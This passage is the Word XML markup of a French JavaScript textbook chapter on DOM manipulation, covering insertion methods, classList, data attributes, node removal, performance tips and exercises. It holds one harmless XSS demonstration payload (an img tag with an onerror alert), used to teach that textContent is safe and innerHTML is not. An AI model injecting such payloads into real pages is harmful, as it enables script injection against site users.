          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="295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after</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Après l'élément</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="278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Sûre</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2950"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="274B6D"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>replaceWith</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Remplace l'élément</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2786"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Sûre</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="295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insertAdjacentHTML</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4 positions</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="278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Interprète le HTML</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="80" w:lineRule="exact"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>textContent</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> écrit du texte, jamais du HTML : c'est la propriété à utiliser pour insérer une donnée utilisateur. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>innerHTML</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> interprète les balises et ouvre la porte aux injections.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="LegendeCode"/>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>La différence décisive entre `textContent` et `innerHTML`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const avis = "&lt;img src=x onerror=alert('xss')&gt;";</w:t>
        <w:br/>
        <w:br/>
        <w:t>liste.textContent = avis;   // affiche le texte, inoffensif</w:t>
        <w:br/>
        <w:t>// liste.innerHTML = avis;  // exécute le code : faille XSS</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>26.4 Classes, attributs et styles</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>classList</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> gère les classes sans écraser les autres. Ne réaffectez jamais </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>className</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> sur un élément dont d'autres scripts ou composants dépendent.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="LegendeCode"/>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>Manipuler les classes et les attributs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const panneau = document.querySelector(".panneau");</w:t>
        <w:br/>
        <w:br/>
        <w:t>panneau.classList.add("ouvert");</w:t>
        <w:br/>
        <w:t>panneau.classList.remove("ferme");</w:t>
        <w:br/>
        <w:t>panneau.classList.toggle("ouvert", estOuvert);</w:t>
        <w:br/>
        <w:t>panneau.classList.replace("ancien", "nouveau");</w:t>
        <w:br/>
        <w:t>panneau.classList.contains("ouvert");     // booléen</w:t>
        <w:br/>
        <w:br/>
        <w:t>panneau.dataset.etat = "ouvert";          // attribut data-etat</w:t>
        <w:br/>
        <w:t>panneau.getAttribute("aria-expanded");    // lecture</w:t>
        <w:br/>
        <w:t>panneau.setAttribute("aria-expanded", "true");</w:t>
        <w:br/>
        <w:t>panneau.removeAttribute("hidden");</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="LegendeCode"/>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>Les styles en ligne se combattent mal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Préférer les classes aux styles en ligne</w:t>
        <w:br/>
        <w:t>panneau.style.height = "0px";        // à éviter : écrase tout style en ligne</w:t>
        <w:br/>
        <w:t>panneau.classList.add("est-ferme");  // à privilégier</w:t>
      </w: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`DATA-*` POUR LES VALEURS, LES CLASSES POUR L'APPARENCE</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="100" w:line="316" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve">Un attribut </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="274B6D"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>data-etat</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve"> peut porter une valeur lue par le CSS (</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="274B6D"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>[data-etat="ouvert"]</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t>) et par le JavaScript. C'est un contrat clair entre les deux.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="140" w:lineRule="exact"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>26.5 Supprimer et déplacer</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Un élément retiré du DOM reste en mémoire tant qu'une variable le référence. Supprimez les écouteurs avant de retirer un nœud conservé, ou laissez le ramasse-miettes faire son travail en supprimant les références.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="LegendeCode"/>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>Supprimer et déplacer un nœud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const element = document.querySelector(".temporaire");</w:t>
        <w:br/>
        <w:t>element.remove();          // moderne, simple</w:t>
        <w:br/>
        <w:t>// parent.removeChild(element);   // équivalent plus ancien</w:t>
        <w:br/>
        <w:br/>
        <w:t>// Déplacer un nœud existant le retire de sa position initiale</w:t>
        <w:br/>
        <w:t>const dernier = document.querySelector(".liste li:last-child");</w:t>
        <w:br/>
        <w:t>document.querySelector(".archive").append(dernier);</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext/>
        <w:keepLines/>
        <w:spacing w:before="120" w:after="0" w:line="20" w:lineRule="exact"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
            <wp:extent cx="5580000" cy="3111500"/>
            <wp:docPr id="36" name="Picture 36"/>
            <wp:cNvGraphicFramePr>
              <a:graphicFrameLocks noChangeAspect="1"/>
            </wp:cNvGraphicFramePr>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="c00_f34.png"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId56"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5580000" cy="3111500"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect"/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Legende"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:i/>
          <w:color w:val="5B6770"/>
          <w:sz w:val="17"/>
        </w:rPr>
        <w:t>Figure 0.34 — Cycle de vie d'un nœud</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>26.6 Performance des manipulations</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Chaque modification du DOM peut déclencher un recalcul de mise en page. Modifier mille éléments un par un produit mille recalculs. Trois techniques évitent ce coût.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="LegendeCode"/>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>Trois techniques de performance DOM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1. Construire hors du DOM, puis insérer une fois</w:t>
        <w:br/>
        <w:t>const fragment = document.createDocumentFragment();</w:t>
        <w:br/>
        <w:t>for (const item of items) {</w:t>
        <w:br/>
        <w:t xml:space="preserve">  const li = document.createElement("li");</w:t>
        <w:br/>
        <w:t xml:space="preserve">  li.textContent = item.nom;</w:t>
        <w:br/>
        <w:t xml:space="preserve">  fragment.append(li);</w:t>
        <w:br/>
        <w:t>}</w:t>
        <w:br/>
        <w:t>liste.append(fragment);</w:t>
        <w:br/>
        <w:br/>
        <w:t>// 2. Grouper les lectures et les écritures</w:t>
        <w:br/>
        <w:t>const hauteur = element.offsetHeight;   // lecture</w:t>
        <w:br/>
        <w:t>element.style.height = hauteur + "px"; // écriture</w:t>
        <w:br/>
        <w:t>// Ne pas alterner lecture/écriture dans une boucle</w:t>
        <w:br/>
        <w:br/>
        <w:t>// 3. Différer avec requestAnimationFrame</w:t>
        <w:br/>
        <w:t>requestAnimationFrame(() =&gt; element.classList.add("visible"));</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Legende"/>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:i/>
          <w:color w:val="5B6770"/>
          <w:sz w:val="17"/>
        </w:rPr>
        <w:t>Tableau 0.84 — Quatre pratiques coûteuses et leur alternative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44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Pratique</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="213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Coût</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="344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Alternative</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3442"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="274B6D"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>innerHTML +=</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:color w:val="0F2E4C"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve"> en boucle</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2131"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Élevé</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3442"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Fragment ou une seule chaîne</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="344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Styles en ligne successifs</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="213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Élevé</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="344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Une classe</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3442"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:color w:val="0F2E4C"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Lecture/écriture alternées</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2131"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Très élevé</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3442"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Regrouper les phases</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="344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Écouteurs sur mille éléments</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="213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Élevé</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="344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Délégation d'événements</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TROIS VÉRIFICATIONS APRÈS UNE MANIPULATION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L'ordre du DOM correspond-il à l'ordre visuel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Les attributs ARIA sont-ils à jour (</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="274B6D"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>aria-expanded</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve">, </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="274B6D"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>aria-hidden</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t>)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 focus reste-t-il au bon endroit ?</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DOM est un arbre vivant, distinct du fichier HTML.</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querySelectorAll</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> renvoie une liste statique.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textContent</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> est sûr, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>innerHTML</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> interprète le HTML.</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classList</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> évite d'écraser les classes existantes.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Les attributs </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>data-*</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> forment un contrat clair avec le CSS.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modifications groupées évitent les recalculs de mise en page.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manipulation visuelle doit préserver l'accessibilité.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>La page peut être modifiée. Le chapitre suivant ajoute la réaction aux actions de l'utilisateur : les événements.</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26.1 — Construire une liste depuis des données</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Affichez un tableau d'objets dans une liste, en toute sécurité.</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Utilisez un fragment.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Échappez les données utilisateur.</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Ajoutez une classe sur les éléments pairs.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Exercice"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="0F2E4C"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>Exercice 26.2 — Basculer un panneau accessible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 bouton ouvre et ferme un panneau. L'état doit être annoncé.</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 xml:space="preserve">Mettez à jour </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>aria-expanded</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Affichez ou masquez le panneau.</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Gardez le focus cohérent.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Exercice"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="0F2E4C"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>Exercice 26.3 — Optimiser une liste de mille éléments</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="E0A21B"/>
          <w:sz w:val="15"/>
        </w:rPr>
        <w:t xml:space="preserve">   PERFORMANCE</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Une liste est reconstruite à chaque frappe dans un champ de recherche.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Identifiez le coût actuel.</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Proposez une solution avec fragment.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Ajoutez un anti-rebond (debounce).</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26.1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const contacts = [</w:t>
        <w:br/>
        <w:t xml:space="preserve">  { nom: "Ada", email: "ada@exemple.fr" },</w:t>
        <w:br/>
        <w:t xml:space="preserve">  { nom: "Grace", email: "grace@exemple.fr" },</w:t>
        <w:br/>
        <w:t>];</w:t>
        <w:br/>
        <w:br/>
        <w:t>const liste = document.querySelector("#contacts");</w:t>
        <w:br/>
        <w:t>const fragment = document.createDocumentFragment();</w:t>
        <w:br/>
        <w:br/>
        <w:t>contacts.forEach((contact, index) =&gt; {</w:t>
        <w:br/>
        <w:t xml:space="preserve">  const li = document.createElement("li");</w:t>
        <w:br/>
        <w:t xml:space="preserve">  li.className = "contact";</w:t>
        <w:br/>
        <w:t xml:space="preserve">  if (index % 2 === 1) li.classList.add("contact--pair");</w:t>
        <w:br/>
        <w:br/>
        <w:t xml:space="preserve">  const nom = document.createElement("strong");</w:t>
        <w:br/>
        <w:t xml:space="preserve">  nom.textContent = contact.nom;</w:t>
        <w:br/>
        <w:br/>
        <w:t xml:space="preserve">  const lien = document.createElement("a");</w:t>
        <w:br/>
        <w:t xml:space="preserve">  lien.href = `mailto:${contact.email}`;</w:t>
        <w:br/>
        <w:t xml:space="preserve">  lien.textContent = contact.email;</w:t>
        <w:br/>
        <w:br/>
        <w:t xml:space="preserve">  li.append(nom, " ", lien);</w:t>
        <w:br/>
        <w:t xml:space="preserve">  fragment.append(li);</w:t>
        <w:br/>
        <w:t>});</w:t>
        <w:br/>
        <w:br/>
        <w:t>liste.append(fragment);</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>textContent</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> empêche toute injection, même si le nom contient des balises.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
